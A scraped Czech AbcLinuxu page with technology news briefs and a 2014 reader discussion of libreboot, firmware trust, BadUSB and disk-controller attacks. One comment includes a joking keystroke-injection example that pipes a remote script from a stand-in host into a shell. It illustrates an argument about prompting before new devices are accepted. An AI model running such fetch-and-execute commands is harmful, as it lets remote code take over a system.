Na čem pracují vývojáři webového prohlížeče Ladybird (GitHub)? Byl publikován přehled vývoje za duben (YouTube).
Provozovatel čínské sociální sítě TikTok dostal v Evropské unii pokutu 530 milionů eur (13,2 miliardy Kč) za nedostatky při ochraně osobních údajů. Ve svém oznámení to dnes uvedla irská Komise pro ochranu údajů (DPC), která jedná jménem EU. Zároveň TikToku nařídila, že pokud správu dat neuvede do šesti měsíců do souladu s požadavky, musí přestat posílat data o unijních uživatelích do Číny. TikTok uvedl, že se proti rozhodnutí odvolá.
Společnost JetBrains uvolnila Mellum, tj. svůj velký jazykový model (LLM) pro vývojáře, jako open source. Mellum podporuje programovací jazyky Java, Kotlin, Python, Go, PHP, C, C++, C#, JavaScript, TypeScript, CSS, HTML, Rust a Ruby.
Vývojáři Kali Linuxu upozorňují na nový klíč pro podepisování balíčků. K původnímu klíči ztratili přístup.
V březnu loňského roku přestal být Redis svobodný. Společnost Redis Labs jej přelicencovala z licence BSD na nesvobodné licence Redis Source Available License (RSALv2) a Server Side Public License (SSPLv1). Hned o pár dní později vznikly svobodné forky Redisu s názvy Valkey a Redict. Dnes bylo oznámeno, že Redis je opět svobodný. S nejnovější verzí 8 je k dispozici také pod licencí AGPLv3.
Oficiální ceny Raspberry Pi Compute Modulů 4 klesly o 5 dolarů (4 GB varianty), respektive o 10 dolarů (8 GB varianty).
Byla vydána beta verze openSUSE Leap 16. Ve výchozím nastavení s novým instalátorem Agama.
Devadesátková hra Brány Skeldalu prošla portací a je dostupná na platformě Steam. Vyšel i parádní blog autora o portaci na moderní systémy a platformy včetně Linuxu.
Lidi dělají divné věci. Například spouští Linux v Excelu. Využít je emulátor RISC-V mini-rv32ima sestavený jako knihovna DLL, která je volaná z makra VBA (Visual Basic for Applications).
Revolut nabídne neomezený mobilní tarif za 12,50 eur (312 Kč). Aktuálně startuje ve Velké Británii a Německu.
Nadace pro svobodný software (FSF) informuje o projektu libreboot. Stejně jako u projektu coreboot je cílem librebootu nahradit proprietární BIOS. Libreboot jde ale ještě dál a z corebootu odstraňuje všechny proprietární bloby. Nadace dále připomíná, že v prosinci 2013 byl představen notebook Gluglug X60 s certifikací Respects Your Freedom (zprávička). Tenkrát ještě s corebootem. Coreboot byl ale časem nahrazen librebootem a notebook přejmenován z Gluglug X60 na LibreBoot X60.
Tiskni
Sdílej:
6.8.2014 14:43
mikirc | skóre: 19
| blog: MikiSoft
| Vsetín
6.8.2014 17:09
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.8.2014 18:52
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
7.8.2014 21:37
mikirc | skóre: 19
| blog: MikiSoft
| Vsetín
7.8.2014 21:42
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
6.8.2014 15:44
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
A doted sem nezjistil, za co se mi vlastne mstis. Jen me tesi, ze te to tak vytocilo.
Co tu mám předvyplněno jako nick mě fakt nijak nezaměstnává
To te muselo neco vytocit. A poradne A to je fajn.
Otazka za zlateho bludistaka: cim to je, ze nadavam zrovna tobe (hele ty jsi ten troll co porad utoci na hagaru, zejo?)?
6.8.2014 17:16
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pro koho je tohle vlastne urcene?Pro lidi, kteří potřebují lowlevel přístup k hardware a potřebují hackovat bootovací proces. A pro lidi, kteří se bojí bezpečnostních chyb v originálním firmware (schválně nepíšu backdoorů, protože ty jsou v hardware; i když třeba AntiTheft s 3G modemem otevírá netušené nové možnosti; ale anténa k tomu modemu lze odstranit pájkou).
BTW jeste mi tam jeste chybi LibreCPU (InteLibre CoreDuo ?), LibreChipset, LibreNIC, LibreUSB, a dalsi...LibreCPU a LibreChipset. Ethernet je celkem jednoduchej. USB je horší.
6.8.2014 17:18
Jendа | skóre: 78
| blog: Jenda
| JO70FB
.
7.8.2014 00:42
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud věříš čipu, tak by ta ao486 měla jít spustit klidně na parallelleNo ale furt potřebuješ proprietární Xilinxové tooly, abys vygeneroval bitstream, ne? A k samotnému formátu bitstreamu žádná dokumentace neexistuje a k čipu už vůbec ne.
).
6.8.2014 17:32
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
USB je horší.Ano, hlavne po tom, co predvedli na Black Hatu
Jeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...
6.8.2014 18:06
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Ano, hlavne po tom, co predvedli na Black HatuMyslíš to BadUSB od Nohla? Osobně mi to přišlo jako slabota. Phantom keyboard je tady už dlouho (NSA Litoměřice vám ji umí dodat přes noc) a to reprogamování flashek je zajímavé z hlediska hackování („jak jsem flashku předělal na ovladač jaderného reaktoru“), ale z bezpečnostního mě to moc nevzrušuje. Rozumné operační systémy mají samozřejmě firewall driverů a zeptají se, než připojí nové zařízení - a když připojím flashku a systém mi napíše „Našel jsem HID vstupní zařízení, chceš ho připojit jako klávesnici?“ a „Zařízení zadalo
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
<Alt><F2> curl b.nsasumperk.cz|sh<Return>“, tak se na toho, kdo mi tu flashku dal, usměju, informaci zavedu do systému GlobalEye a tím to končí.
A že to umí emulovat síťovku? Pokud nemáte rozbitej network manager (myslím ten typ software, ne tu konkrétní implementaci, která se naneštěstí jmenuje NetworkManager), tak vám po připojení síťovky přece nebude automaticky konfigurovat její DNS.
Jeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smaže - což třeba disky Seagate dělají velmi rády a nemyslím si, že by to byl zrovna backdoor :). Neomezené DMA do paměti to nemá (to už spíš je problém řadič, který sedí typicky na PCIe a může si vynutit bus mastering) a s daty to moc manipulovat nemůže, protože ze systému mu chodí už zašifrované bloky.
Ehm... Hard disk hackingJeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smaže - což třeba disky Seagate dělají velmi rády a nemyslím si, že by to byl zrovna backdoor :)
6.8.2014 18:26
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.8.2014 18:51
Jendа | skóre: 78
| blog: Jenda
| JO70FB
(nemám moc jiných možností jak to nabootovat).No, to ne no, leda si s sebou nosit flashku nebo SD kartu, ale vrchol praktičnosti to není...
6.8.2014 20:37
xkucf03 | skóre: 49
| blog: xkucf03
Nebo SecureBoot (kdyby tahle technologie pracovala ve prospěch uživatele). Ideálně mít právě ten coreboot/libreboot jako bezpečný startovací bod a pak z něj můžeš ověřit integritu boot sektoru, zavaděče nebo jádra.
6.8.2014 21:12
xkucf03 | skóre: 49
| blog: xkucf03
Přečteš si jeho zdrojáky a zkompiluješ si ho. Otázka je, kde vzít ten první důvěryhodný počítač, na kterém tohle udělat. Asi by šlo použít větší počet různě starých počítačů od různých výrobců a porovnat, zda výsledek je stejný. 
(že by byl ve všech stejný backdoor je nepravděpodobné)
7.8.2014 10:13
xkucf03 | skóre: 49
| blog: xkucf03
Za předpokladu, že to kontroluješ na důvěryhodném počítači1 a ten disassembler ti nekecá. Ale uznávám, že tohle je už hodně paranoidní
[1] a ten vezmeš kde?
7.8.2014 14:58
pavlix | skóre: 54
| blog: pavlix
7.8.2014 14:59
xkucf03 | skóre: 49
| blog: xkucf03
Proto jsem navrhoval radši to použití více různě starých počítačů – z nich si vyděruješ programy a porovnáš, jestli jsou díry na stejných místech.
6.8.2014 21:17
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
6.8.2014 22:50
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
Myslíš to BadUSB od Nohla? Osobně mi to přišlo jako slabota.Pokud se nenajde nejaky 0day v USB stacku - vzpomen si na Stuxnet, tam je jich to na nic neptalo. Ja vim, ze to bylo na Widlich, ale Linux zacina byt taky v hledacku, hlavne po tom, co prosaklo, ze NSA zameruje "technicky zdatne uzivatele", cimz nemyslim to ohledne linuxjournal.
HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smažeMuze treba misto dat zapisovat nesmysly (k cemu jsou ti zasifrovana data, kdyz je neprectes). A taky - porad je to dual-core arm s dram, coz je prostredi pro beh cehokoli (nekde jsem mel odkaz, kde se na tm pokuseli rozbehnout linux).
7.8.2014 00:39
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud se nenajde nejaky 0day v USB stackuJo, to je pravda, že by se to pak dál šířilo. Spíš než přímo v USB stacku je ale podle mě mnohem (mnohem!) víc chyb v ovladačích zařízení. Zrovna včera v noci jsem ladil, proč mi nefunguje CH34xx (hint: řádek 312 a dál - what could possibly go wrong? :) a pokud jsou drivery běžně napsané tímto stylem, tak teda potěš koště. Další důvod pro driver firewalling.
Ten controller navic ovlada SATA interface, kde je obvykle zapnute DMASATA AFAIK jenom streamuje data, kam do paměti se zapíšou určuje řadič → musel by být bug tam (taky už jsem viděl řadič (VT6420), který uměl softwarově havarovat).
hint: řádek 312 a dálHehe, jaká krásná detekce NULL pointeru
(ale tady to aspoň není inline funkce, tam to je mnohem víc na pěst). Jinak ale myslím, že mnoho těch testů se neprovádí a předpokládá se, že kernel drivery jsou sane. Už třeba to vytáhnutí priv dat předpokládá validní pointer.
port_probe), takže driver může celkem spolehlivě předpokládat, že tam NULL nebude. Zjevně to není ten typ funkce, která by něco prováděla a mohla NULLem indikovat selhání, je to prostě getter.
7.8.2014 11:57
Jendа | skóre: 78
| blog: Jenda
| JO70FB
stty. A taky to při každém open() dělá znova celou inicializaci, což způsobí reset čipu a v tomto případě kvůli tomu i reset AVR, co je za ním.
a cortex m3, ktery udajne nic nedelaJe otázka zda by ten Cortex M3 stíhal zasahovat do práce těch dvou rychlých ARMů. Pořád může existovat normální firmware modul, který ho používá (ten člověk by musel dekompilovat všechny firmware moduly, aby si byl jistý). Nejspíš to bude pomocný procesor, který buď používají pro testování při provozu (ARMy "M" jsou malý). Nebo používá WD generickej čipset (seagate má tuším na zakázku).
Ten controller navic ovlada SATA interface, kde je obvykle zapnute DMA, otazka je, jestli se to neda vyuzit stejne jako Firewire, pokud ma clovek "spravny" firmware.Diskový řadič pouze posílá data na signál (od DMA řadiče nebo od CPU). IDE PRD tabulka (cílový region a délka) se klasicky nastavuje driverem. Zajímavý ale bude řešení toho SATA express portu (SATA+PCIe linka). Po PCIe se už dá zapisovat do hlavní RAM (ale to už zase bude nespíš s nějakým MMU pro PCIe).
USB je horší.Tak na USB full speed hosta jde použít PIC a nejspíš by šel bitbangovat na FPGA (blésmrt). A je dost možný, že budou existovat i nějaký phy bez integrovanýho firmware.
Dá se tady v ČR někde sehnat ten LibreBoot X60?
7.8.2014 08:37
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Díky za reakci. Může někdo prosím potvrdit, že má Jenda pravdu?
7.8.2014 12:20
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
Díky.
7.8.2014 19:44
Jendа | skóre: 78
| blog: Jenda
| JO70FB
jen by se asi hádali kvůli tomu librebootuNo tak se tam před reklamací vrátí původní firmware… Btw. Binary situation
7.8.2014 12:27
pavlix | skóre: 54
| blog: pavlix
7.8.2014 19:43
Jendа | skóre: 78
| blog: Jenda
| JO70FB
8.8.2014 00:01
pavlix | skóre: 54
| blog: pavlix
8.8.2014 06:24
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
8.8.2014 09:55
pavlix | skóre: 54
| blog: pavlix
8.8.2014 10:05
xkucf03 | skóre: 49
| blog: xkucf03
Nevíte někdo, jak je to s podporou virtualizace?
Na shop.gluglug.org.uk píší, že to má Core Duo T2400, což je podle Intelu 32-bit s podporou Intel® Virtualization Technology (VT-x) ovšem s poznámkou: This feature may not be available on all computing systems. A to jsem měl pocit, že se 32-bitové virtualizační procesory snad ani nedělaly.
8.8.2014 10:24
pavlix | skóre: 54
| blog: pavlix